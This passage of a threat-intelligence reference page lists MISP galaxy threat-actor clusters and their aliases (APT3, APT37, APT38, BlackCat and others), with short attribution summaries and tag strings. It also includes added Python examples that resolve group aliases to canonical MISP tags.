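    raise KeyError(f"alias {value!r} has no resolvable primary group")


def normalise_event_tags(tags: List[str], galaxy: str = "groups") -> List[str]:
    """Collapse an event's group tags to their primary clusters, deduplicated, order kept.

    Tags from other galaxies (campaigns, software, ...) pass through untouched.
    """
    out: List[str] = []
    for t in tags:
        g, _ = parse_tag(t)
        canonical = resolve_primary(t) if g == galaxy else t
        if canonical not in out:
            out.append(canonical)
    return out


if __name__ == "__main__":
    sample = ['misp-galaxy:groups="Cozy Bear - Associated Group"',
              'misp-galaxy:groups="UNC2452 - Associated Group"',
              'misp-galaxy:groups="APT29"',
              'misp-galaxy:campaigns="SolarWinds Compromise"']
    print(normalise_event_tags(sample))
```

Run against the sample event, the three APT29 tags collapse to one misp-galaxy:groups="APT29" tag while the campaign tag is left alone; the "Orphan" entry shows why the resolver raises rather than returning the alias, since a dangling edge usually means the galaxy export and the tagging source are out of sync.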

Gothic Panda - Associated Group

The tag is: misp-galaxy:groups="Gothic Panda - Associated Group"

Pirpi - Associated Group

The tag is: misp-galaxy:groups="Pirpi - Associated Group"

UPS Team - Associated Group

The tag is: misp-galaxy:groups="UPS Team - Associated Group"

Buckeye - Associated Group

The tag is: misp-galaxy:groups="Buckeye - Associated Group"

Threat Group-0110 - Associated Group

The tag is: misp-galaxy:groups="Threat Group-0110 - Associated Group"

TG-0110 - Associated Group

The tag is: misp-galaxy:groups="TG-0110 - Associated Group"

APT3

[APT3](https://app.tidalcyber.com/groups/9da726e6-af02-49b8-8ebe-7ea4235513c9) is a China-based threat group that researchers have attributed to China’s Ministry of State Security.<sup>[[FireEye Clandestine Wolf](https://app.tidalcyber.com/references/dbb779c4-4d75-4fb4-ad3a-7d1f0f74e26f)]</sup><sup>[[Recorded Future APT3 May 2017](https://app.tidalcyber.com/references/a894d79f-5977-4ef9-9aa5-7bfec795ceb2)]</sup> This group is responsible for the campaigns known as Operation Clandestine Fox, Operation Clandestine Wolf, and Operation Double Tap.<sup>[[FireEye Clandestine Wolf](https://app.tidalcyber.com/references/dbb779c4-4d75-4fb4-ad3a-7d1f0f74e26f)]</sup><sup>[[FireEye Operation Double Tap](https://app.tidalcyber.com/references/4b9af128-98da-48b6-95c7-8d27979c2ab1)]</sup> As of June 2015, the group appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong.<sup>[[Symantec Buckeye](https://app.tidalcyber.com/references/dbf3ce3e-bcf2-4e47-ad42-839e51967395)]</sup>

In 2017, MITRE developed an APT3 Adversary Emulation Plan.<sup>[[APT3 Adversary Emulation Plan](https://app.tidalcyber.com/references/64c01921-c33f-402e-b30d-a2ba26583a24)]</sup>

The tag is: misp-galaxy:groups="APT3"

APT30

[APT30](https://app.tidalcyber.com/groups/be45ff95-6c74-4000-bc39-63044673d82f) is a threat group suspected to be associated with the Chinese government. While [Naikon](https://app.tidalcyber.com/groups/a80c00b2-b8b6-4780-99bb-df8fe921947d) shares some characteristics with [APT30](https://app.tidalcyber.com/groups/be45ff95-6c74-4000-bc39-63044673d82f), the two groups do not appear to be exact matches.<sup>[[FireEye APT30](https://app.tidalcyber.com/references/c48d2084-61cf-4e86-8072-01e5d2de8416)]</sup><sup>[[Baumgartner Golovkin Naikon 2015](https://app.tidalcyber.com/references/5163576f-0b2c-49ba-8f34-b7efe3f3f6db)]</sup>

The tag is: misp-galaxy:groups="APT30"

OceanLotus - Associated Group

The tag is: misp-galaxy:groups="OceanLotus - Associated Group"

APT-C-00 - Associated Group

The tag is: misp-galaxy:groups="APT-C-00 - Associated Group"

SeaLotus - Associated Group

The tag is: misp-galaxy:groups="SeaLotus - Associated Group"

APT32

[APT32](https://app.tidalcyber.com/groups/c0fe9859-e8de-4ce1-bc3c-b489e914a145) is a suspected Vietnam-based threat group that has been active since at least 2014. The group has targeted multiple private sector industries as well as foreign governments, dissidents, and journalists with a strong focus on Southeast Asian countries like Vietnam, the Philippines, Laos, and Cambodia. They have extensively used strategic web compromises to compromise victims.<sup>[[FireEye APT32 May 2017](https://app.tidalcyber.com/references/b72d017b-a70f-4003-b3d9-90d79aca812d)]</sup><sup>[[Volexity OceanLotus Nov 2017](https://app.tidalcyber.com/references/ed9f5545-377f-4a12-92e4-c0439cc5b037)]</sup><sup>[[ESET OceanLotus](https://app.tidalcyber.com/references/a7bcbaca-10c1-403a-9eb5-f111af1cbf6a)]</sup>

The tag is: misp-galaxy:groups="APT32"

HOLMIUM - Associated Group

The tag is: misp-galaxy:groups="HOLMIUM - Associated Group"

Elfin - Associated Group

The tag is: misp-galaxy:groups="Elfin - Associated Group"

Peach Sandstorm - Associated Group

<sup>[[Microsoft Peach Sandstorm September 14 2023](/references/98a631f4-4b95-4159-b311-dee1216ec208)]</sup>

The tag is: misp-galaxy:groups="Peach Sandstorm - Associated Group"

APT33

[APT33](https://app.tidalcyber.com/groups/99bbbe25-45af-492f-a7ff-7cbc57828bac) is a suspected Iranian threat group that has carried out operations since at least 2013. The group has targeted organizations across multiple industries in the United States, Saudi Arabia, and South Korea, with a particular interest in the aviation and energy sectors. <sup>[[FireEye APT33 Sept 2017](https://app.tidalcyber.com/references/70610469-db0d-45ab-a790-6e56309a39ec)]</sup> <sup>[[FireEye APT33 Webinar Sept 2017](https://app.tidalcyber.com/references/9b378592-5737-403d-8a07-27077f5b2d61)]</sup>

The tag is: misp-galaxy:groups="APT33"

InkySquid - Associated Group

<sup>[[Volexity InkySquid BLUELIGHT August 2021](https://app.tidalcyber.com/references/7e394434-364f-4e50-9a96-3e75dacc9866)]</sup>

The tag is: misp-galaxy:groups="InkySquid - Associated Group"

ScarCruft - Associated Group

The tag is: misp-galaxy:groups="ScarCruft - Associated Group"

Reaper - Associated Group

The tag is: misp-galaxy:groups="Reaper - Associated Group"

Group123 - Associated Group

The tag is: misp-galaxy:groups="Group123 - Associated Group"

TEMP.Reaper - Associated Group

The tag is: misp-galaxy:groups="TEMP.Reaper - Associated Group"

Ricochet Chollima - Associated Group

<sup>[[CrowdStrike Richochet Chollima September 2021](https://app.tidalcyber.com/references/69a23467-c55c-43a3-951d-c208e6ead6f7)]</sup>

The tag is: misp-galaxy:groups="Ricochet Chollima - Associated Group"

APT37

[APT37](https://app.tidalcyber.com/groups/013fdfdc-aa32-4779-8f6e-7920615cbf66) is a North Korean state-sponsored cyber espionage group that has been active since at least 2012. The group has targeted victims primarily in South Korea, but also in Japan, Vietnam, Russia, Nepal, China, India, Romania, Kuwait, and other parts of the Middle East. [APT37](https://app.tidalcyber.com/groups/013fdfdc-aa32-4779-8f6e-7920615cbf66) has also been linked to the following campaigns between 2016-2018: Operation Daybreak, Operation Erebus, Golden Time, Evil New Year, Are you Happy?, FreeMilk, North Korean Human Rights, and Evil New Year 2018.<sup>[[FireEye APT37 Feb 2018](https://app.tidalcyber.com/references/4d575c1a-4ff9-49ce-97cd-f9d0637c2271)]</sup><sup>[[Securelist ScarCruft Jun 2016](https://app.tidalcyber.com/references/04961952-9bac-48f3-adc7-40a3a2bcee84)]</sup><sup>[[Talos Group123](https://app.tidalcyber.com/references/bf8b2bf0-cca3-437b-a640-715f9cc945f7)]</sup>

North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) instead of tracking clusters or subgroups.

The tag is: misp-galaxy:groups="APT37"
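The layout above is regular: each "<name> - Associated Group" entry, with its own tag, precedes the primary cluster it belongs to (ScarCruft, Reaper, Group123 and the others hang off APT37). In practice an analyst wants to normalise whatever name a vendor report uses into the one tag MISP will accept. The following stdlib-only Python is an added example, not code from the MISP galaxy or from Tidal Cyber, that parses this listing into an alias-to-canonical-tag map; the sample text is a constructed excerpt in the page's own format, and the function and variable names are the example's own.

```python
"""Resolve threat-actor aliases to the canonical MISP galaxy cluster tag.

Added example (not part of the MISP galaxy or Tidal Cyber data). It relies
only on the listing's layout: every "<name> - Associated Group" tag line is
followed, sooner or later, by the tag line of the primary cluster it belongs
to. Aliases are buffered until that primary tag line appears.
"""
import re
from typing import Dict, List, Optional

# Matches the page's "The tag is:" lines and captures the tag and the cluster name.
TAG_RE = re.compile(r'^The tag is: (misp-galaxy:groups="(?P<name>[^"]+)")$')
ALIAS_SUFFIX = " - Associated Group"

# Constructed sample in the page's layout (a trimmed excerpt, not the full galaxy).
SAMPLE = """\
ScarCruft - Associated Group

The tag is: misp-galaxy:groups="ScarCruft - Associated Group"

Reaper - Associated Group

The tag is: misp-galaxy:groups="Reaper - Associated Group"

APT37

North Korean state-sponsored cyber espionage group (description elided).

The tag is: misp-galaxy:groups="APT37"

Bluenoroff - Associated Group

The tag is: misp-galaxy:groups="Bluenoroff - Associated Group"

APT38

The tag is: misp-galaxy:groups="APT38"
"""


def parse_galaxy_listing(text: str) -> Dict[str, str]:
    """Return {lower-cased primary name or alias: canonical galaxy tag}.

    Alias entries are held in `pending` until the next non-alias tag line,
    which is the primary cluster they are associated with. An alias that is
    never followed by a primary cluster (e.g. a listing cut off mid-group)
    is deliberately left unresolved rather than guessed.
    """
    mapping: Dict[str, str] = {}
    pending: List[str] = []
    for raw in text.splitlines():
        m = TAG_RE.match(raw.strip())
        if not m:
            continue  # descriptions, headings and blank lines carry no tag
        tag, name = m.group(1), m.group("name")
        if name.endswith(ALIAS_SUFFIX):
            pending.append(name[: -len(ALIAS_SUFFIX)])
            continue
        mapping[name.lower()] = tag
        for alias in pending:
            # setdefault: if the same alias name appears under two clusters,
            # keep the first mapping and leave the ambiguity for a human.
            mapping.setdefault(alias.lower(), tag)
        pending.clear()
    return mapping


def resolve(name: str, mapping: Dict[str, str]) -> Optional[str]:
    """Case-insensitive lookup. Returns None for unknown names instead of
    inventing a tag, so callers can fall back to manual review."""
    return mapping.get(name.strip().lower())


if __name__ == "__main__":
    aliases = parse_galaxy_listing(SAMPLE)
    for reported in ("ScarCruft", "reaper", "Bluenoroff", "Lazarus Group"):
        print(f"{reported!r:16} -> {resolve(reported, aliases)}")
```

Feed it the full rendered listing and the returned map can be used to tag events with the resolved string (for example via MISP's REST API or PyMISP); names the parser cannot resolve should be queued for an analyst rather than tagged by guesswork, since North Korean and Chinese cluster names in particular overlap across vendors.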

Stardust Chollima - Associated Group

<sup>[[CrowdStrike Stardust Chollima Profile April 2018](https://app.tidalcyber.com/references/a0119ad4-ceea-4dba-bc08-a682085a9b27)]</sup><sup>[[CrowdStrike GTR 2021 June 2021](https://app.tidalcyber.com/references/ec58e524-6de5-4cbb-a5d3-984b9b652f26)]</sup>

The tag is: misp-galaxy:groups="Stardust Chollima - Associated Group"

NICKEL GLADSTONE - Associated Group

<sup>[[SecureWorks NICKEL GLADSTONE profile Sept 2021](https://app.tidalcyber.com/references/c78a8379-04a4-4558-820d-831ad4f267fd)]</sup>

The tag is: misp-galaxy:groups="NICKEL GLADSTONE - Associated Group"

BeagleBoyz - Associated Group

<sup>[[CISA AA20-239A BeagleBoyz August 2020](https://app.tidalcyber.com/references/a8a2e3f2-3967-4e82-a36a-2436c654fb3f)]</sup>

The tag is: misp-galaxy:groups="BeagleBoyz - Associated Group"

Bluenoroff - Associated Group

<sup>[[Kaspersky Lazarus Under The Hood Blog 2017](https://app.tidalcyber.com/references/a1e1ab6a-8db0-4593-95ec-78784607dfa0)]</sup>

The tag is: misp-galaxy:groups="Bluenoroff - Associated Group"

APT38

[APT38](https://app.tidalcyber.com/groups/dfbce236-735c-436d-b433-933bd6eae17b) is a North Korean state-sponsored threat group that specializes in financial cyber operations; it has been attributed to the Reconnaissance General Bureau.<sup>[[CISA AA20-239A BeagleBoyz August 2020](https://app.tidalcyber.com/references/a8a2e3f2-3967-4e82-a36a-2436c654fb3f)]</sup> Active since at least 2014, [APT38](https://app.tidalcyber.com/groups/dfbce236-735c-436d-b433-933bd6eae17b) has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. Significant operations include the 2016 Bank of Bangladesh heist, during which [APT38](https://app.tidalcyber.com/groups/dfbce236-735c-436d-b433-933bd6eae17b) stole $81 million, as well as attacks against Bancomext (2018) and Banco de Chile (2018); some of their attacks have been destructive.<sup>[[CISA AA20-239A BeagleBoyz August 2020](https://app.tidalcyber.com/references/a8a2e3f2-3967-4e82-a36a-2436c654fb3f)]</sup><sup>[[FireEye APT38 Oct 2018](https://app.tidalcyber.com/references/7c916329-af56-4723-820c-ef932a6e3409)]</sup><sup>[[DOJ North Korea Indictment Feb 2021](https://app.tidalcyber.com/references/d702653f-a9da-4a36-8f84-97caeb445266)]</sup><sup>[[Kaspersky Lazarus Under The Hood Blog 2017](https://app.tidalcyber.com/references/a1e1ab6a-8db0-4593-95ec-78784607dfa0)]</sup>

North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) instead of tracking clusters or subgroups.

The tag is: misp-galaxy:groups="APT38"

ITG07 - Associated Group

<sup>[[FBI FLASH APT39 September 2020](https://app.tidalcyber.com/references/76869199-e9fa-41b4-b045-41015e6daaec)]</sup><sup>[[Dept. of Treasury Iran Sanctions September 2020](https://app.tidalcyber.com/references/0c8ff80a-6b1d-4212-aa40-99aeef04ce05)]</sup><sup>[[DOJ Iran Indictments September 2020](https://app.tidalcyber.com/references/f30a77dd-d1d0-41b8-b82a-461dd6cd126f)]</sup>

The tag is: misp-galaxy:groups="ITG07 - Associated Group"

Chafer - Associated Group

Activities associated with APT39 largely align with a group publicly referred to as Chafer.<sup>[[FireEye APT39 Jan 2019](https://app.tidalcyber.com/references/ba366cfc-cc04-41a5-903b-a7bb73136bc3)]</sup><sup>[[Symantec Chafer Dec 2015](https://app.tidalcyber.com/references/0a6166a3-5649-4117-97f4-7b8b5b559929)]</sup><sup>[[Dark Reading APT39 JAN 2019](https://app.tidalcyber.com/references/b310dfa4-f4ee-4a0c-82af-b0fdef1a1f58)]</sup><sup>[[FBI FLASH APT39 September 2020](https://app.tidalcyber.com/references/76869199-e9fa-41b4-b045-41015e6daaec)]</sup><sup>[[Dept. of Treasury Iran Sanctions September 2020](https://app.tidalcyber.com/references/0c8ff80a-6b1d-4212-aa40-99aeef04ce05)]</sup><sup>[[DOJ Iran Indictments September 2020](https://app.tidalcyber.com/references/f30a77dd-d1d0-41b8-b82a-461dd6cd126f)]</sup>

The tag is: misp-galaxy:groups="Chafer - Associated Group"

Remix Kitten - Associated Group

The tag is: misp-galaxy:groups="Remix Kitten - Associated Group"

APT39

[APT39](https://app.tidalcyber.com/groups/a57b52c7-9f64-4ffe-a7c3-0de738fb2af1) is one of several names for cyber espionage activity conducted by the Iranian Ministry of Intelligence and Security (MOIS) through the front company Rana Intelligence Computing since at least 2014. [APT39](https://app.tidalcyber.com/groups/a57b52c7-9f64-4ffe-a7c3-0de738fb2af1) has primarily targeted the travel, hospitality, academic, and telecommunications industries in Iran and across Asia, Africa, Europe, and North America to track individuals and entities considered to be a threat by the MOIS.<sup>[[FireEye APT39 Jan 2019](https://app.tidalcyber.com/references/ba366cfc-cc04-41a5-903b-a7bb73136bc3)]</sup><sup>[[Symantec Chafer Dec 2015](https://app.tidalcyber.com/references/0a6166a3-5649-4117-97f4-7b8b5b559929)]</sup><sup>[[FBI FLASH APT39 September 2020](https://app.tidalcyber.com/references/76869199-e9fa-41b4-b045-41015e6daaec)]</sup><sup>[[Dept. of Treasury Iran Sanctions September 2020](https://app.tidalcyber.com/references/0c8ff80a-6b1d-4212-aa40-99aeef04ce05)]</sup><sup>[[DOJ Iran Indictments September 2020](https://app.tidalcyber.com/references/f30a77dd-d1d0-41b8-b82a-461dd6cd126f)]</sup>

The tag is: misp-galaxy:groups="APT39"

Wicked Panda - Associated Group

The tag is: misp-galaxy:groups="Wicked Panda - Associated Group"

APT41

[APT41](https://app.tidalcyber.com/groups/502223ee-8947-42f8-a532-a3b3da12b7d9) is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://app.tidalcyber.com/groups/502223ee-8947-42f8-a532-a3b3da12b7d9) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://app.tidalcyber.com/groups/502223ee-8947-42f8-a532-a3b3da12b7d9) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://app.tidalcyber.com/groups/6932662a-53a7-4e43-877f-6e940e2d744b).<sup>[[FireEye APT41 Aug 2019](https://app.tidalcyber.com/references/20f8e252-0a95-4ebd-857c-d05b0cde0904)]</sup><sup>[[Group IB APT 41 June 2021](https://app.tidalcyber.com/references/a2bf43a0-c7da-4cb9-8f9a-b34fac92b625)]</sup>

The tag is: misp-galaxy:groups="APT41"

Blind Eagle - Associated Group

The tag is: misp-galaxy:groups="Blind Eagle - Associated Group"

APT-C-36

[APT-C-36](https://app.tidalcyber.com/groups/153c14a6-31b7-44f2-892e-6d9fdc152267) is a suspected South American espionage group that has been active since at least 2018. The group mainly targets Colombian government institutions as well as important corporations in the financial sector, petroleum industry, and professional manufacturing.<sup>[[QiAnXin APT-C-36 Feb2019](https://app.tidalcyber.com/references/cae075ea-42cb-4695-ac66-9187241393d1)]</sup>

The tag is: misp-galaxy:groups="APT-C-36"

Aquatic Panda

[Aquatic Panda](https://app.tidalcyber.com/groups/b8a349a6-cde1-4d95-b20f-44c62bbfc786) is a suspected China-based threat group with a dual mission of intelligence collection and industrial espionage. Active since at least May 2020, [Aquatic Panda](https://app.tidalcyber.com/groups/b8a349a6-cde1-4d95-b20f-44c62bbfc786) has primarily targeted entities in the telecommunications, technology, and government sectors.<sup>[[CrowdStrike AQUATIC PANDA December 2021](https://app.tidalcyber.com/references/fd095ef2-6fc2-4f6f-9e4f-037b2a9217d2)]</sup>

The tag is: misp-galaxy:groups="Aquatic Panda"

Group 72 - Associated Group

The tag is: misp-galaxy:groups="Group 72 - Associated Group"

Axiom

[Axiom](https://app.tidalcyber.com/groups/90f4d3f9-3fe3-4a64-8dc1-172c6d037dca) is a suspected Chinese cyber espionage group that has targeted the aerospace, defense, government, manufacturing, and media sectors since at least 2008. Some reporting suggests a degree of overlap between [Axiom](https://app.tidalcyber.com/groups/90f4d3f9-3fe3-4a64-8dc1-172c6d037dca) and [Winnti Group](https://app.tidalcyber.com/groups/6932662a-53a7-4e43-877f-6e940e2d744b) but the two groups appear to be distinct based on differences in reporting on TTPs and targeting.<sup>[[Kaspersky Winnti April 2013](https://app.tidalcyber.com/references/2d4834b9-61c4-478e-919a-317d97cd2c36)]</sup><sup>[[Kaspersky Winnti June 2015](https://app.tidalcyber.com/references/86504950-0f4f-42bc-b003-24f60ae97c99)]</sup><sup>[[Novetta Winnti April 2015](https://app.tidalcyber.com/references/cbe8373b-f14b-4890-99fd-35ffd7090dea)]</sup>

The tag is: misp-galaxy:groups="Axiom"

BackdoorDiplomacy

[BackdoorDiplomacy](https://app.tidalcyber.com/groups/e5b0da2b-12bc-4113-9459-9c51329c9ae0) is a cyber espionage threat group that has been active since at least 2017. [BackdoorDiplomacy](https://app.tidalcyber.com/groups/e5b0da2b-12bc-4113-9459-9c51329c9ae0) has targeted Ministries of Foreign Affairs and telecommunication companies in Africa, Europe, the Middle East, and Asia.<sup>[[ESET BackdoorDiplomacy Jun 2021](https://app.tidalcyber.com/references/127d4b10-8d61-4bdf-b5b9-7d86bbc065b6)]</sup>

The tag is: misp-galaxy:groups="BackdoorDiplomacy"

BianLian Ransomware Group

BianLian is an extortion-focused threat actor group. The group originally used double-extortion methods when it began its operations in June 2022, demanding payment in exchange for decrypting locked files while also threatening to leak exfiltrated data. U.S. & Australian cybersecurity officials observed BianLian actors shifting almost exclusively to exfiltration-focused extortion schemes in 2023.<sup>[[U.S. CISA BianLian Ransomware May 2023](/references/aa52e826-f292-41f6-985d-0282230c8948)]</sup>

Related Vulnerabilities: CVE-2020-1472<sup>[[U.S. CISA BianLian Ransomware May 2023](/references/aa52e826-f292-41f6-985d-0282230c8948)]</sup>, CVE-2021-34473<sup>[[BianLian Ransomware Gang Gives It a Go! | [redacted]](/references/fc1aa979-7dbc-4fff-a8d1-b35a3b2bec3d)]</sup>, CVE-2021-34523<sup>[[BianLian Ransomware Gang Gives It a Go! | [redacted]](/references/fc1aa979-7dbc-4fff-a8d1-b35a3b2bec3d)]</sup>, CVE-2021-31207<sup>[[BianLian Ransomware Gang Gives It a Go! | [redacted]](/references/fc1aa979-7dbc-4fff-a8d1-b35a3b2bec3d)]</sup>

The tag is: misp-galaxy:groups="BianLian Ransomware Group"

T-APT-17 - Associated Group

<sup>[[Cisco Talos Bitter Bangladesh May 2022](https://app.tidalcyber.com/references/097583ed-03b0-41cd-bf85-66d473f46439)]</sup>

The tag is: misp-galaxy:groups="T-APT-17 - Associated Group"

BITTER

[BITTER](https://app.tidalcyber.com/groups/3a02aa1b-851a-43e1-b83b-58037f3c7025) is a suspected South Asian cyber espionage threat group that has been active since at least 2013. [BITTER](https://app.tidalcyber.com/groups/3a02aa1b-851a-43e1-b83b-58037f3c7025) has primarily targeted government, energy, and engineering organizations in Pakistan, China, Bangladesh, and Saudi Arabia.<sup>[[Cisco Talos Bitter Bangladesh May 2022](https://app.tidalcyber.com/references/097583ed-03b0-41cd-bf85-66d473f46439)]</sup><sup>[[Forcepoint BITTER Pakistan Oct 2016](https://app.tidalcyber.com/references/9fc54fb0-b7d9-49dc-b6dd-ab4cb2cd34fa)]</sup>

The tag is: misp-galaxy:groups="BITTER"

Bl00dy Ransomware Gang

Bl00dy self-identifies as a ransomware group. It gained attention in May 2023 for a series of data exfiltration and encryption attacks against education entities in the United States that featured exploitation of vulnerabilities in PaperCut print management software, which is prevalent in the sector.<sup>[[U.S. CISA PaperCut May 2023](/references/b5ef2b97-7cc7-470b-ae97-a45dc4af32a6)]</sup>

Related Vulnerabilities: CVE-2023-27350<sup>[[U.S. CISA PaperCut May 2023](/references/b5ef2b97-7cc7-470b-ae97-a45dc4af32a6)]</sup>

The tag is: misp-galaxy:groups="Bl00dy Ransomware Gang"

BlackCat Ransomware Actors & Affiliates

This object represents the BlackCat/ALPHV Ransomware-as-a-Service (“RaaS”) apex group and the behaviors associated with its various affiliate ransomware operators. Specific affiliate operations defined by the research community will be tracked as separate objects.

Researchers first observed BlackCat ransomware (AKA ALPHV or Noberus) in November 2021. An April 2022 U.S. FBI advisory linked BlackCat’s developers and money launderers to the defunct Blackmatter and Darkside ransomware operations (the latter was responsible for the major 2021 Colonial Pipeline incident).<sup>[[FBI BlackCat April 19 2022](/references/2640b58c-8413-4691-80e1-33aec9b6c7f6)]</sup> As of September 2023, BlackCat is believed to be responsible for attacking organizations globally and in virtually every major sector, and it consistently claims some of the highest victim tallies of any RaaS. According to data collected by the [ransomwatch project](https://github.com/joshhighet/ransomwatch) and analyzed by Tidal, BlackCat actors publicly claimed 233 victims in 2022, the third most of any ransomware operation in the dataset (considerably below Clop (558) but well above Hive (181)), and it already surpassed that number by July of 2023.<sup>[[GitHub ransomwatch](/references/62037959-58e4-475a-bb91-ff360d20c1d7)]</sup> Like many RaaS, BlackCat actors threaten to leak exfiltrated victim data, but they also threaten to carry out denial of service attacks if victims do not pay timely ransoms.<sup>[[BlackBerry BlackCat Threat Overview](/references/59f98ae1-c62d-460f-8d2a-9ae287b59953)]</sup>

BlackCat developers have regularly evolved the namesake ransomware over time, and collaboration with affiliates means that a large number and variety of tools & TTPs are observed during intrusions involving BlackCat. BlackCat became the first prominent ransomware family to transition to the Rust programming language in 2022, which researchers assess provides greater customization and defense evasion capabilities and faster performance.<sup>[[X-Force BlackCat May 30 2023](/references/b80c1f70-9d05-4f4b-bdc2-6157c6837202)]</sup><sup>[[FBI BlackCat April 19 2022](/references/2640b58c-8413-4691-80e1-33aec9b6c7f6)]</sup> A BlackCat variant named Sphynx emerged in early 2023, featuring multiple defense evasion-focused enhancements. In Q3 2023, public reports suggested that Scattered Spider (AKA 0ktapus or UNC3944), a group attributed to several prominent intrusions involving telecommunications, technology, and casino entities, had begun to use BlackCat/Sphynx ransomware during its operations.<sup>[[Caesars Scattered Spider September 13 2023](/references/6915c003-7c8b-451c-8fb1-3541f00c14fb)]</sup><sup>[[BushidoToken Scattered Spider August 16 2023](/references/621a8320-0e3c-444f-b82a-7fd4fdf9fb67)]</sup>

The tag is: misp-galaxy:groups="BlackCat Ransomware Actors & Affiliates"

BlackOasis

[BlackOasis](https://app.tidalcyber.com/groups/428dc121-a593-4981-9127-f958ae0a0fdd) is a Middle Eastern threat group that is believed to be a customer of Gamma Group. The group has shown interest in prominent figures in the United Nations, as well as opposition bloggers, activists, regional news correspondents, and think tanks. <sup>[[Securelist BlackOasis Oct 2017](https://app.tidalcyber.com/references/66121c37-6b66-4ab2-9f63-1adb80dcec62)]</sup> <sup>[[Securelist APT Trends Q2 2017](https://app.tidalcyber.com/references/fe28042c-d289-463f-9ece-1a75a70b966e)]</sup> A group known by Microsoft as [NEODYMIUM](https://app.tidalcyber.com/groups/3a660ef3-9954-4252-8946-f903f3f42d0c) is reportedly associated closely with [BlackOasis](https://app.tidalcyber.com/groups/428dc121-a593-4981-9127-f958ae0a0fdd) operations, but evidence that the group names are aliases has not been identified. <sup>[[CyberScoop BlackOasis Oct 2017](https://app.tidalcyber.com/references/a8224ad5-4688-4382-a3e7-1dd3ed74ebce)]</sup>

The tag is: misp-galaxy:groups="BlackOasis"

Palmerworm - Associated Group

The tag is: misp-galaxy:groups="Palmerworm - Associated Group"

Temp.Overboard - Associated Group

<sup>[[U.S. CISA BlackTech September 27 2023](/references/309bfb48-76d1-4ae9-9c6a-30b54658133c)]</sup>

The tag is: misp-galaxy:groups="Temp.Overboard - Associated Group"

Circuit Panda - Associated Group

<sup>[[U.S. CISA BlackTech September 27 2023](/references/309bfb48-76d1-4ae9-9c6a-30b54658133c)]</sup>

The tag is: misp-galaxy:groups="Circuit Panda - Associated Group"

Radio Panda - Associated Group

<sup>[[U.S. CISA BlackTech September 27 2023](/references/309bfb48-76d1-4ae9-9c6a-30b54658133c)]</sup>

The tag is: misp-galaxy:groups="Radio Panda - Associated Group"

BlackTech

[BlackTech](https://app.tidalcyber.com/groups/528ab2ea-b8f1-44d8-8831-2a89fefd97cb) is a suspected Chinese cyber espionage group that has primarily targeted organizations in East Asia (particularly Taiwan, Japan, and Hong Kong) and the US since at least 2013. [BlackTech](https://app.tidalcyber.com/groups/528ab2ea-b8f1-44d8-8831-2a89fefd97cb) has used a combination of custom malware, dual-use tools, and living off the land tactics to compromise media, construction, engineering, electronics, and financial company networks.<sup>[[TrendMicro BlackTech June 2017](https://app.tidalcyber.com/references/abb9cb19-d30e-4048-b106-eb29a6dad7fc)]</sup><sup>[[Symantec Palmerworm Sep 2020](https://app.tidalcyber.com/references/84ecd475-8d3f-4e7c-afa8-2dff6078bed5)]</sup><sup>[[Reuters Taiwan BlackTech August 2020](https://app.tidalcyber.com/references/77293f88-e336-4786-b042-7f0080bbff32)]</sup>

The tag is: misp-galaxy:groups="BlackTech"

Blue Mockingbird

[Blue Mockingbird](https://app.tidalcyber.com/groups/b82c6ed1-c74a-4128-8b4d-18d1e17e1134) is a cluster of observed activity involving Monero cryptocurrency-mining payloads in dynamic-link library (DLL) form on Windows systems. The earliest observed Blue Mockingbird tools were created in December 2019.<sup>[[RedCanary Mockingbird May 2020](https://app.tidalcyber.com/references/596bfbb3-72e0-4d4c-a1a9-b8d54455ffd0)]</sup>

The tag is: misp-galaxy:groups="Blue Mockingbird"

REDBALDKNIGHT - Associated Group

The tag is: misp-galaxy:groups="REDBALDKNIGHT - Associated Group"

Tick - Associated Group

The tag is: misp-galaxy:groups="Tick - Associated Group"

BRONZE BUTLER

[BRONZE BUTLER](https://app.tidalcyber.com/groups/5825a840-5577-4ffc-a08d-3f48d64395cb) is a cyber espionage group with likely Chinese origins that has been active since at least 2008. The group primarily targets Japanese organizations, particularly those in government, biotechnology, electronics manufacturing, and industrial chemistry.<sup>[[Trend Micro Daserf Nov 2017](https://app.tidalcyber.com/references/4ca0e6a9-8c20-49a0-957a-7108083a8a29)]</sup><sup>[[Secureworks BRONZE BUTLER Oct 2017](https://app.tidalcyber.com/references/c62d8d1a-cd1b-4b39-95b6-68f3f063dacf)]</sup><sup>[[Trend Micro Tick November 2019](https://app.tidalcyber.com/references/93adbf0d-5f5e-498e-aca1-ed3eb11561e7)]</sup>

The tag is: misp-galaxy:groups="BRONZE BUTLER"

Anunak - Associated Group

The tag is: misp-galaxy:groups="Anunak - Associated Group"

Chimera

[Chimera](https://app.tidalcyber.com/groups/ca93af75-0ffa-4df4-b86a-92d4d50e496e) is a suspected China-based threat group that has been active since at least 2018 targeting the semiconductor industry in Taiwan as well as data from the airline industry.<sup>[[Cycraft Chimera April 2020](https://app.tidalcyber.com/references/a5a14a4e-2214-44ab-9067-75429409d744)]</sup><sup>[[NCC Group Chimera January 2021](https://app.tidalcyber.com/references/70c217c3-83a2-40f2-8f47-b68d8bd4cdf0)]</sup>

The tag is: misp-galaxy:groups="Chimera"

Threat Group 2889 - Associated Group

The tag is: misp-galaxy:groups="Threat Group 2889 - Associated Group"

TG-2889 - Associated Group

The tag is: misp-galaxy:groups="TG-2889 - Associated Group"

Cleaver

[Cleaver](https://app.tidalcyber.com/groups/c8cc6ce8-d421-42e6-a6eb-2ea9d2d9ab07) is a threat group that has been attributed to Iranian actors and is responsible for activity tracked as Operation Cleaver. <sup>[[Cylance Cleaver](https://app.tidalcyber.com/references/f0b45225-3ec3-406f-bd74-87f24003761b)]</sup> Strong circumstantial evidence suggests Cleaver is linked to Threat Group 2889 (TG-2889). <sup>[[Dell Threat Group 2889](https://app.tidalcyber.com/references/de7003cb-5127-4fd7-9475-d69e0d7f5cc8)]</sup>

